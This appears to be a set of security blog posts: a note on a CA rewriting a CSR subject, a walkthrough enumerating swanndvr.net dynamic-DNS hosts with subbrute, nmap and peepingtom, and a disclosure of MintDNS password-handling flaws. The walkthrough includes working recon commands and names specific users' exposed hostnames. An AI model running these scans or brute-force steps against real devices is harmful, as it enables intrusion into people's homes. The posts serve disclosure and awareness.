                    5e:04:43:56:df:c2:48:f7:41
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: sha1WithRSAEncryption
         01:e8:97:81:25:0b:b1:c5:9c:66:62:6f:0a:6a:00:b6:1d:6c:
         d9:17:50:20:16:42:54:4e:cb:30:c7:a3:35:bb:fd:22:a3:d6:
         73:5e:ea:2d:fb:50:39:3b:56:84:bc:3e:d1:cf:62:7c:03:b5:
         43:d7:5d:38:b8:cd:39:d1:89:09:23:44:d8:ef:17:ce:e3:5b:
         9d:2d:8a:4c:9e:45:81:a2:70:88:db:d5:aa:6c:7b:03:f2:2b:
         ee:b2:67:2f:62:3e:cf:d1:e2:fd:e4:d0:82:66:00:26:3a:6f:
         b8:f4:ff:e4:85:4f:de:d5:51:a6:a0:07:ef:33:ab:b5:d1:04:
         eb:18

This has a subject containing an email address – cybergibbon@test.com – and my public key. That whole lot is then signed with my private key. This allows the recipient of the CSR to verify that someone with the private key corresponding to the public key has added the data cybergibbon@test.com.
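For illustration, this is roughly how such a CSR can be produced with the Python cryptography library (a sketch only – the CSR above was generated elsewhere, and the key size here is just an example):

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([
        x509.NameAttribute(NameOID.EMAIL_ADDRESS, "cybergibbon@test.com"),
    ]))
    .sign(key, hashes.SHA256())  # the requester signs the subject and public key
)

print(csr.is_signature_valid)                                 # True
print(csr.public_bytes(serialization.Encoding.PEM).decode())  # PEM CSR to send to the CA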

I thought the CA then signed the entire CSR, preserving the subject, and hence also my signature. It turns out that they can actually just re-write the subject and sign it – my signature is no longer involved!

Here is an example certificate received back from the CA:

root@kali:~# openssl x509 -in cybergibbon_at_test.com.crt -text -noout
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 35242 (0x89aa)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=DK, O=HackingTeam
        Validity
            Not Before: Jul  6 03:52:32 2015 GMT
            Not After : Jul  4 01:52:33 2025 GMT
        Subject: emailAddress=cybergibbons@test.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:ea:a9:04:df:20:63:6d:78:8d:a4:c3:8a:7e:b5:
                    a9:38:a7:1d:2a:75:20:90:45:2d:c9:9e:b3:08:18:
                    a9:59:d4:79:95:40:ef:cc:4f:2c:93:73:21:02:05:
                    9b:47:c4:9b:73:21:a8:fe:da:9c:2c:71:98:f5:49:
                    37:a7:28:a4:f5:14:6a:a0:91:dd:a7:87:63:d4:b4:
                    2a:aa:a6:9b:b2:a4:72:ab:91:58:2b:e5:6e:34:84:
                    05:ce:c8:dc:7f:3c:33:5f:d2:14:27:37:34:ee:aa:
                    58:29:de:5c:f5:b7:93:69:94:a9:20:02:84:fb:cd:
                    5e:04:43:56:df:c2:48:f7:41
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                49:85:CB:85:5F:EF:50:A6:2E:E1:B0:95:33:24:77:58:6C:70:C7:62
            X509v3 Authority Key Identifier: 
                keyid:65:F1:07:3D:58:53:F3:BE:1C:02:0C:B6:36:E6:3F:95:F5:60:33:E3

    Signature Algorithm: sha1WithRSAEncryption
         59:73:5f:2c:5c:19:2f:ec:db:3d:38:40:45:ed:72:d9:6b:dc:
         ac:2e:99:fa:db:ae:59:6f:aa:06:ab:73:4e:06:46:13:71:3f:
         81:2e:76:b3:4a:fb:82:cf:4c:d3:43:9f:f4:6f:08:5e:d6:22:
         44:c7:5d:e3:fa:5c:83:01:82:03:d5:10:74:17:0b:ed:4d:2f:
         4a:72:2e:63:6d:78:7d:2f:dc:62:8d:72:f8:96:05:61:ea:36:
         a4:b3:81:24:1e:62:12:04:48:f6:d1:ca:27:66:54:94:ec:24:
         ad:c3:aa:1a:e1:90:1c:f9:5c:ae:0e:ba:c9:94:fe:30:75:50:
         c1:a3:69:8f:13:25:8f:b1:81:45:08:b9:30:3d:26:9a:0a:6e:
         bc:74:97:6e:fb:2d:5f:86:21:b5:0c:b1:a0:47:e5:95:d4:24:
         8f:f8:ad:52:0b:a6:f7:54:f8:17:06:26:1e:57:47:36:48:49:
         a8:c6:50:a0:69:4a:c2:8f:35:5c:73:cd:5b:a7:d6:14:e3:30:
         c6:61:a0:dc:a2:c9:14:67:01:d3:f2:c6:bc:52:44:0e:bb:fc:
         60:69:c1:28:63:f7:9b:d6:f9:4c:d9:b7:3a:21:2c:93:7b:8c:
         e7:f8:ab:62:3c:be:19:d0:e0:94:86:58:71:b7:4f:a5:f6:a3:
         16:f8:0a:61

As you can see – there is no notion of my signature in there. The email of cybergibbon@test.com has been altered to cybergibbons@test.com by the CA. This is because my registered email is cybergibbons@test.com.

It's not very important, but I was initially excited when the CA appeared to return a certificate for an email address I wasn't registered with, as it could have led to an interesting vulnerability. It's important to note that a CA can issue a certificate without the owner of the public key being aware.


Why dynamic DNS is a bad idea for the Internet of Things

Dynamic DNS has been around for a good while now, allowing users who have dynamic IPs (or even those with static IPs, no DNS, and bad memory) to use a hostname of their dynamic DNS provider to point towards their home IP.

Dynamic DNS makes it easier for a user to connect back to their home IP and interact with devices in their network. It provides a mapping between a constant hostname (e.g. cybergibbons.swanndvr.net) and your IP (82.158.226.34).

A device on your network (maybe your router, often a specific device) periodically communicates your IP to the dynamic DNS service. The domain name resolution changes as your IP changes. This means that if your IP changes, you can still connect to your home network using the constant hostname.

Simply knowing the IP is not enough – you need to be able to actually connect to the devices. Normally a home router has a firewall set to reject nearly all incoming traffic. A user needs to punch a hole through the firewall, often using something called port-forwarding.

This exposes a device on your private network to the wider Internet. You are no longer using the security of your router’s firewall, but depending on the security of the device you have exposed.

Devices like IP CCTV cameras, network/digital video recorders, thermostats, and home automation hubs often rely on this combination of port-forwarding and dynamic DNS.

For example, a lot of Swann DVRs recommend you port-forward port 85 from your router back to your DVR. Swann then runs their own dynamic DNS service, which the DVR can be configured to communicate with.

Sounds like a great idea, doesn’t it? Users can easily connect back to their IoT devices from outside their home.

Unfortunately, dynamic DNS, especially when it is provided by device manufacturers, is generally a bad idea.

Why?

Finding hostnames

Each user that uses dynamic DNS has a unique subdomain – e.g. cybergibbons.swanndvr.net – try it using nslookup:
(screenshot: nslookup resolving cybergibbons.swanndvr.net to an IP address)

(no, that’s not my own IP)

Now try something that doesn’t exist:

(screenshot: nslookup returning no address for a hostname that doesn't exist)

And you can see we get no response (as long as no-one registers that domain after I publish this…)

We can do this as a bulk operation, using a large wordlist and a tool called subbrute. This tool is commonly used during the discovery phase of a pen test to find new hosts. Subbrute uses a wide array of DNS servers rather than just your own, allowing it to run more quickly and with a lower risk of rate limiting.

It's important to note that the operator of swanndvr.net is highly unlikely to notice someone brute-forcing sub-domains like this. They might see a slightly higher rate of lookups than average, as new DNS servers end up having to make recursive requests for their authoritative records. But the attacker's IP will remain entirely hidden. The dynamic DNS users will see nothing at all from this attack.

The wordlist required for this application differs from a typical host wordlist. We don't want to find ftp, dev1, vpn, etc. We want to find optus, redrover, zion, pchome, concordia. These are closer to usernames than normal hostnames. I used a custom list of usernames and hostnames built up over the last few years for this, but other sources like fuzzdb and SecLists are good starting points.
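The core of the technique is trivial – resolve each candidate name and keep the ones that answer. A minimal sketch of the idea (subbrute does this far faster and via many open resolvers):

import socket

def find_hosts(domain, wordlist):
    found = []
    for name in wordlist:
        host = "%s.%s" % (name, domain)
        try:
            found.append((host, socket.gethostbyname(host)))
        except socket.gaierror:
            pass  # name doesn't resolve - move on
    return found

# Candidate names look more like usernames than typical hostnames
print(find_hosts("swanndvr.net", ["optus", "redrover", "zion", "pchome"]))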

Running subbrute against swanndvr.net quickly got me a list of 2401 valid hostnames. I’m sure a longer wordlist would reveal more hostnames, but 2401 is enough for this.

Scanning hosts for webservices

Given that swanndvr.net is intended to be used by people who own Swann products, I thought I would concentrate on ports that Swann products commonly use. This includes the typical ports 80 (HTTP) and 443 (HTTPS), but also 85 (a lot of Swann products run HTTP on this port).

Let’s fire up nmap:

nmap -vv -Pn -iL swann_hosts.txt -T5 -p80,85,443 --open -oA nmap_swann | tee nmap_swann.txt
  • -vv – verbose output
  • -Pn – don't ping-check hosts first
  • -iL swann_hosts.txt – take this file as the input
  • -T5 – scan fast
  • -p80,85,443 – scan ports 80, 85 and 443
  • --open – only show open ports
  • -oA nmap_swann – output in greppable, nmap and XML formats
  • | tee nmap_swann.txt – also write the console output to a text file

This scan will run quickly – we are only trying three ports on (mainly) consumer routers, so there is little risk of anything clamming up with the fast scan.

After this, we have 335 hosts running something on one of these three ports. That's a lot of hosts to check manually. I won't post the results here as they are likely transient.

Screengrabbing hosts

Luckily there is a tool that is designed to take a list of hosts/services and grab a screenshot of each one. It's called peepingtom. It uses PhantomJS, a headless browser, to render the webpages, save a screenshot and the source, and present them in a nice HTML file. It also works with nmap output files.

At the moment, there are no binaries available for PhantomJS, so you will need to build it yourself under Linux. This takes quite a while.

Running peepingtom is very simple, but it doesn’t, by default, treat port 85 as HTTP. We need to edit the peepingtom.py file. In the function parseNmap, add 85 to the http_ports:
(screenshot: http_ports in parseNmap with 85 added)

Now we run peepingtom:

./peepingtom.py -x nmap_swann.xml

It will take quite a while to run. Peepingtom won’t do anything complex with JavaScript, redirects, Flash etc. so some of the results will be basic, but it’s easy enough to confirm the interesting results in a browser.

What do we find?

Lots of IIS, generally vulnerable to MS15-034 (27/335 hosts running IIS, 21 vulnerable). I guess people into DVRs like tinkering with IT and forgetting about what they are running.

(screenshot: http://bsc.swanndvr.net:80)

Lots of DVRs, which may (or may not) use default (or no) credentials.

(screenshot: http://worcester.swanndvr.net:80)

(screenshot: http://comet.swanndvr.net:80)

Some IP cameras:

(screenshot: https://gcc.swanndvr.net:443)

Lots and lots of modems and routers, some with no login credentials at all.

In fact, it looks like about 85 hosts are running DVRs, and about 30 of these have an easy to exploit vulnerability that I found a few months back (responsible disclosure ongoing…) that results in root access to a fairly powerful embedded Linux box.

Scanning hosts for other typically insecure services

Going back for another nmap scan, this time on ports 21 (FTP), 22 (SSH), 23 (Telnet) and 25 (SMTP), we find even more hosts running services. Telnet is very popular.

Conclusion

So what is the issue here?

Dynamic DNS gives me a very easy way of identifying hosts that run multiple, likely insecure services/devices including those made by specific manufacturers.

These IoT devices nearly always have some vulnerabilities and very rarely receive any firmware updates to fix them.

It’s like a big flag shouting “hack me”!

I could take over 30 DVRs just from this small amount of work and use them for whatever I want.

It would take me much longer to scan the entire IPv4 address space to find these specific devices.

What’s the solution? Stop relying on port-forwarding to allow connectivity to your devices. If you need to, make them secure and don’t allow default credentials!


MintDNS dynamic DNS software – multiple vulnerabilities

MintDNS is a piece of software used to provide dynamic DNS services. It runs under Windows, and I can find ~50 different CCTV/NVR providers using it.

I’ve only had a very quick check of this piece of software, but it appears to suffer from multiple, fairly serious, vulnerabilities.

User input validation is performed client side

There are a number of checks, on things like password length, done client-side. These can easily be bypassed by setting values directly in requests. For example, custom security questions can be set, and empty passwords used.

Passwords stored in the plain

The database stores passwords, encoded as base64, in the Admin and Users tables:

Users table

Admin table

dGVzdHBhc3M= is “testpass”

It is neither advisable nor forgivable to store passwords in the plain anymore.

Passwords stored in the plain in a cookie

When logging in, the base64 password is stored in the plain in a cookie.

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /devices.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DDNS=user=a@test.com&pass=dGVzdHBhc3M=; expires=Fri, 05-Jun-2015 14:25:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Jun 2015 14:25:24 GMT
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdevices.aspx">here</a>.</h2>
</body></html>

There really is no excuse for this either. This is what session tokens are for.

Password check from cookie is case-insensitive

Each time a page is viewed, the password is checked from the cookie. Because the database stores the password in base64 and the cookie is in base64, they are directly compared.

However, this is done in SQL, where string comparison is case-insensitive by default.

This means that the base64 string of dGVzdHBhc3M= (testpass) is just as valid as DgvZDhbHC3m= or any of the other variations.
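To see what that means in practice, this is effectively the comparison the SQL is doing (illustrative Python):

import base64

stored = "dGVzdHBhc3M="   # base64 of "testpass", as held in the database
supplied = "DgvZDhbHC3m="  # a case-flipped variant sent in the cookie

# A case-insensitive comparison (SQL's default here) treats them as equal...
print(stored.lower() == supplied.lower())  # True
# ...even though only the original decodes to the real password
print(base64.b64decode(stored))            # b'testpass'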

No password brute-force protection on cookie

Whilst the login form has brute-force protection (“FloodCheck”), the cookie doesn’t have any brute-force protection. You can just chug through passwords as quickly as you like.

Brute-force cookie password – long response indicates success

A lack of brute-force protection is common on cookie values, but usually the token is a lengthy session token with enough entropy to mean this is not an issue.

Password reset is insecure

On attempting to reset a password, the first step is to provide the email address.

Once this is done, you are presented with a security question:
Security question

This has no brute-force protection in the form of lockout or captcha, so off we go with a brute-force attack – against something that has a lot lower entropy than a password. I’d wager that a list of 100 common foods, 100 common cities and common phone number formats would yield a vast majority of accounts.

But when we get the question right, how does it deal with it?

Cookie with original password

That’s right! It puts the original password into the cookie, base64 encoded!

Conclusion

I stopped looking at this point. MintDNS has enough issues that I wouldn't use it. Reviewing the .aspx files indicates to me that the development is ad-hoc and a bit naive. The website doesn't really indicate that the software has been updated in the last 5 years.

I found a couple of instances where user input was reflected back in the response, but there are basic XSS checks combined with the IIS/ASP checks, so it did not appear to be exploitable.